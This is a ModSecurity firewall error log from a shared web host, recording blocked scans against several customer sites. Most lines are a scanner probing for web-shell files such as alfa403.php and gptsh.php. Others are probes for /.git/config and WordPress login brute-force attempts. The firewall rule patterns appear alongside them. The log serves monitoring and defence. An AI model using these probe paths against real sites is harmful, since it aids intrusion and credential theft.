[Tue May 26 14:44:40.514242 2026] [autoindex:error] [pid 636820:tid 637014] [client 49.234.192.248:41748] AH01276: Cannot serve directory /home2/ushapjsg/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:44:41.066729 2026] [security2:error] [pid 636820:tid 637018] [client 107.189.16.223:61425] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "agsnails.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahVkga_r6oOphPch7B-SPQAAAEQ"]
[Tue May 26 14:44:41.517493 2026] [security2:error] [pid 636820:tid 636962] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkga_r6oOphPch7B-SQAAAAAw"]
[Tue May 26 14:44:41.911528 2026] [security2:error] [pid 636820:tid 637040] [client 209.59.231.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkga_r6oOphPch7B-SVQAAAFo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 14:44:42.997634 2026] [security2:error] [pid 636820:tid 637004] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkgq_r6oOphPch7B-ScAAAADY"]
[Tue May 26 14:44:45.294104 2026] [security2:error] [pid 636820:tid 636952] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkhK_r6oOphPch7B-SrwAAAAI"]
[Tue May 26 14:44:45.632410 2026] [security2:error] [pid 636820:tid 637051] [client 20.29.64.60:1668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.64.29.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/mybplfpm.php"] [unique_id "ahVkha_r6oOphPch7B-SuQAAAGU"], referer: www.google.com
[Tue May 26 14:44:46.458532 2026] [security2:error] [pid 636820:tid 636988] [client 81.22.193.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkhq_r6oOphPch7B-S1QAAACY"], referer: https://www.anujtradingco.com/
[Tue May 26 14:44:47.172362 2026] [security2:error] [pid 636820:tid 637018] [client 158.62.209.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkh6_r6oOphPch7B-S4QAAAEQ"], referer: https://www.anujtradingco.com/
[Tue May 26 14:44:47.262949 2026] [security2:error] [pid 636820:tid 637022] [client 202.141.83.254:53889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkh6_r6oOphPch7B-S6gAAAEg"]
[Tue May 26 14:44:47.263054 2026] [security2:error] [pid 636820:tid 637022] [client 202.141.83.254:53889] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVkh6_r6oOphPch7B-S6gAAAEg"]
[Tue May 26 14:44:47.665703 2026] [security2:error] [pid 636820:tid 636953] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkh6_r6oOphPch7B-S6QAAAAM"]
[Tue May 26 14:44:47.847850 2026] [security2:error] [pid 636820:tid 636989] [client 81.22.193.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkh6_r6oOphPch7B-S9gAAACc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1431741&moderation-hash=49c10c23b02da98e066105372b2c9381
[Tue May 26 14:44:49.166396 2026] [security2:error] [pid 636820:tid 637021] [client 158.62.209.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkia_r6oOphPch7B-TLAAAAEc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1467180&moderation-hash=2deb8a8c28da6452be42e88f0da5e5af
[Tue May 26 14:44:49.942744 2026] [security2:error] [pid 636820:tid 636998] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkia_r6oOphPch7B-TPwAAADA"]
[Tue May 26 14:44:49.991483 2026] [security2:error] [pid 636820:tid 636987] [client 45.148.10.120:33812] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "staging.unsobered.com"] [uri "/.git/config"] [unique_id "ahVkia_r6oOphPch7B-TUAAAACU"]
[Tue May 26 14:44:50.255895 2026] [security2:error] [pid 636820:tid 636951] [client 209.59.231.229:35801] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVkia_r6oOphPch7B-TQQAAAAE"], referer: https://anujtradingco.com
[Tue May 26 14:44:50.358104 2026] [security2:error] [pid 636820:tid 637011] [client 64.89.161.160:59287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 160.161.89.64.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/assets/admin/plugins/elfinder/connectors/php/connector.php"] [unique_id "ahVkiq_r6oOphPch7B-TWQAAAD0"]
[Tue May 26 14:44:50.665332 2026] [security2:error] [pid 636820:tid 636898] [remote 103.11.102.106:52650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahVkiq_r6oOphPch7B-TZgAAB00"]
[Tue May 26 14:44:50.821842 2026] [security2:error] [pid 636820:tid 636977] [client 114.119.146.114:33027] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "koneksi.com.co"] [uri "/home/page/2"] [unique_id "ahVkiq_r6oOphPch7B-TdAAAABs"], referer: https://koneksi.com.co/home/page/2
[Tue May 26 14:44:51.204977 2026] [security2:error] [pid 636820:tid 637058] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkiq_r6oOphPch7B-TcwAAAGw"]
[Tue May 26 14:44:51.449424 2026] [security2:error] [pid 636820:tid 636987] [client 20.151.130.61:41058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVki6_r6oOphPch7B-TigAAACU"]
[Tue May 26 14:44:51.449563 2026] [security2:error] [pid 636820:tid 636987] [client 20.151.130.61:41058] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVki6_r6oOphPch7B-TigAAACU"]
[Tue May 26 14:44:51.875337 2026] [security2:error] [pid 636820:tid 637009] [client 20.151.130.61:40962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/x.php"] [unique_id "ahVki6_r6oOphPch7B-TlgAAADs"]
[Tue May 26 14:44:51.875422 2026] [security2:error] [pid 636820:tid 637009] [client 20.151.130.61:40962] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/x.php"] [unique_id "ahVki6_r6oOphPch7B-TlgAAADs"]
[Tue May 26 14:44:52.081078 2026] [security2:error] [pid 636820:tid 637026] [client 20.151.130.61:41085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wpconf.php"] [unique_id "ahVkjK_r6oOphPch7B-TogAAAEw"]
[Tue May 26 14:44:52.081181 2026] [security2:error] [pid 636820:tid 637026] [client 20.151.130.61:41085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wpconf.php"] [unique_id "ahVkjK_r6oOphPch7B-TogAAAEw"]
[Tue May 26 14:44:52.525936 2026] [security2:error] [pid 636820:tid 637051] [client 20.151.130.61:40964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/aaf.php"] [unique_id "ahVkjK_r6oOphPch7B-TsQAAAGU"]
[Tue May 26 14:44:52.526067 2026] [security2:error] [pid 636820:tid 637051] [client 20.151.130.61:40964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/aaf.php"] [unique_id "ahVkjK_r6oOphPch7B-TsQAAAGU"]
[Tue May 26 14:44:53.071177 2026] [security2:error] [pid 636820:tid 636987] [client 20.151.130.61:41024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wander.php"] [unique_id "ahVkja_r6oOphPch7B-TwwAAACU"]
[Tue May 26 14:44:53.071272 2026] [security2:error] [pid 636820:tid 636987] [client 20.151.130.61:41024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/wander.php"] [unique_id "ahVkja_r6oOphPch7B-TwwAAACU"]
[Tue May 26 14:44:53.383183 2026] [security2:error] [pid 636820:tid 637020] [client 20.151.130.61:40968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/gptsh.php"] [unique_id "ahVkja_r6oOphPch7B-T0QAAAEY"]
[Tue May 26 14:44:53.383271 2026] [security2:error] [pid 636820:tid 637020] [client 20.151.130.61:40968] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/gptsh.php"] [unique_id "ahVkja_r6oOphPch7B-T0QAAAEY"]
[Tue May 26 14:44:53.567495 2026] [security2:error] [pid 636820:tid 637073] [client 20.151.130.61:41035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xocx.php"] [unique_id "ahVkja_r6oOphPch7B-T2AAAAHs"]
[Tue May 26 14:44:53.567712 2026] [security2:error] [pid 636820:tid 637073] [client 20.151.130.61:41035] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xocx.php"] [unique_id "ahVkja_r6oOphPch7B-T2AAAAHs"]
[Tue May 26 14:44:53.654805 2026] [security2:error] [pid 636820:tid 636985] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkja_r6oOphPch7B-T2wAAACM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1223669&moderation-hash=40cf7a45ba50da8387788ed7f2655c59
[Tue May 26 14:44:53.686478 2026] [security2:error] [pid 636820:tid 637070] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkja_r6oOphPch7B-TygAAAHg"]
[Tue May 26 14:44:53.755847 2026] [security2:error] [pid 636820:tid 637034] [client 20.151.130.61:41049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/155.php"] [unique_id "ahVkja_r6oOphPch7B-T5QAAAFQ"]
[Tue May 26 14:44:53.755989 2026] [security2:error] [pid 636820:tid 637034] [client 20.151.130.61:41049] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/155.php"] [unique_id "ahVkja_r6oOphPch7B-T5QAAAFQ"]
[Tue May 26 14:44:54.118354 2026] [security2:error] [pid 636820:tid 637013] [client 20.151.130.61:41087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/colay.php"] [unique_id "ahVkjq_r6oOphPch7B-T5gAAAD8"]
[Tue May 26 14:44:54.118523 2026] [security2:error] [pid 636820:tid 637013] [client 20.151.130.61:41087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/colay.php"] [unique_id "ahVkjq_r6oOphPch7B-T5gAAAD8"]
[Tue May 26 14:44:54.567651 2026] [security2:error] [pid 636820:tid 637056] [client 62.113.113.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVkjq_r6oOphPch7B-T9QAAAGo"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1223669&moderation-hash=40cf7a45ba50da8387788ed7f2655c59
[Tue May 26 14:44:54.682819 2026] [security2:error] [pid 636820:tid 637047] [client 20.151.130.61:41027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/hly.php"] [unique_id "ahVkjq_r6oOphPch7B-T-QAAAGE"]
[Tue May 26 14:44:54.682951 2026] [security2:error] [pid 636820:tid 637047] [client 20.151.130.61:41027] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/hly.php"] [unique_id "ahVkjq_r6oOphPch7B-T-QAAAGE"]
[Tue May 26 14:44:55.018994 2026] [security2:error] [pid 636820:tid 636951] [client 20.151.130.61:41063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ppp.php"] [unique_id "ahVkj6_r6oOphPch7B-UBgAAAAE"]
[Tue May 26 14:44:55.019136 2026] [security2:error] [pid 636820:tid 636951] [client 20.151.130.61:41063] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ppp.php"] [unique_id "ahVkj6_r6oOphPch7B-UBgAAAAE"]
[Tue May 26 14:44:55.254175 2026] [security2:error] [pid 636820:tid 637004] [client 20.151.130.61:40966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/201.php"] [unique_id "ahVkj6_r6oOphPch7B-UDwAAADY"]
[Tue May 26 14:44:55.254272 2026] [security2:error] [pid 636820:tid 637004] [client 20.151.130.61:40966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/201.php"] [unique_id "ahVkj6_r6oOphPch7B-UDwAAADY"]
[Tue May 26 14:44:55.477133 2026] [security2:error] [pid 636820:tid 637009] [client 20.151.130.61:41064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ops.php"] [unique_id "ahVkj6_r6oOphPch7B-UFgAAADs"]
[Tue May 26 14:44:55.477266 2026] [security2:error] [pid 636820:tid 637009] [client 20.151.130.61:41064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ops.php"] [unique_id "ahVkj6_r6oOphPch7B-UFgAAADs"]
[Tue May 26 14:44:55.659066 2026] [security2:error] [pid 636820:tid 636956] [client 20.151.130.61:41059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/samll.php"] [unique_id "ahVkj6_r6oOphPch7B-UIAAAAAY"]
[Tue May 26 14:44:55.659185 2026] [security2:error] [pid 636820:tid 636956] [client 20.151.130.61:41059] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/samll.php"] [unique_id "ahVkj6_r6oOphPch7B-UIAAAAAY"]
[Tue May 26 14:44:55.967406 2026] [security2:error] [pid 636820:tid 637070] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVkj6_r6oOphPch7B-UGQAAAHg"]
[Tue May 26 14:44:56.032790 2026] [security2:error] [pid 636820:tid 637071] [client 20.151.130.61:41055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ingfo.php"] [unique_id "ahVkkK_r6oOphPch7B-UKgAAAHk"]
[Tue May 26 14:44:56.032930 2026] [security2:error] [pid 636820:tid 637071] [client 20.151.130.61:41055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/ingfo.php"] [unique_id "ahVkkK_r6oOphPch7B-UKgAAAHk"]
[Tue May 26 14:44:56.306903 2026] [security2:error] [pid 636820:tid 637014] [client 20.151.130.61:41071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/c55cdler.php"] [unique_id "ahVkkK_r6oOphPch7B-UNQAAAEA"]
[Tue May 26 14:44:56.307028 2026] [security2:error] [pid 636820:tid 637014] [client 20.151.130.61:41071] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/c55cdler.php"] [unique_id "ahVkkK_r6oOphPch7B-UNQAAAEA"]
[Tue May 26 14:44:56.484855 2026] [security2:error] [pid 636820:tid 636996] [client 20.151.130.61:40986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/error_log.php"] [unique_id "ahVkkK_r6oOphPch7B-UOQAAAC4"]
[Tue May 26 14:44:56.484975 2026] [security2:error] [pid 636820:tid 636996] [client 20.151.130.61:40986] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/error_log.php"] [unique_id "ahVkkK_r6oOphPch7B-UOQAAAC4"]
[Tue May 26 14:44:56.822600 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:41036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xenon1337.php"] [unique_id "ahVkkK_r6oOphPch7B-UQAAAAEg"]
[Tue May 26 14:44:56.822720 2026] [security2:error] [pid 636820:tid 637022] [client 20.151.130.61:41036] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/xenon1337.php"] [unique_id "ahVkkK_r6oOphPch7B-UQAAAAEg"]
[Tue May 26 14:44:57.257713 2026] [security2:error] [pid 636820:tid 637026] [client 20.151.130.61:41045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.130.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "redstudioanima.contabilidadecarioca.com.br"] [uri "/alfa403.php"] [unique_id "ahVkka_r6oOphPch7B-USwAAAEw"]
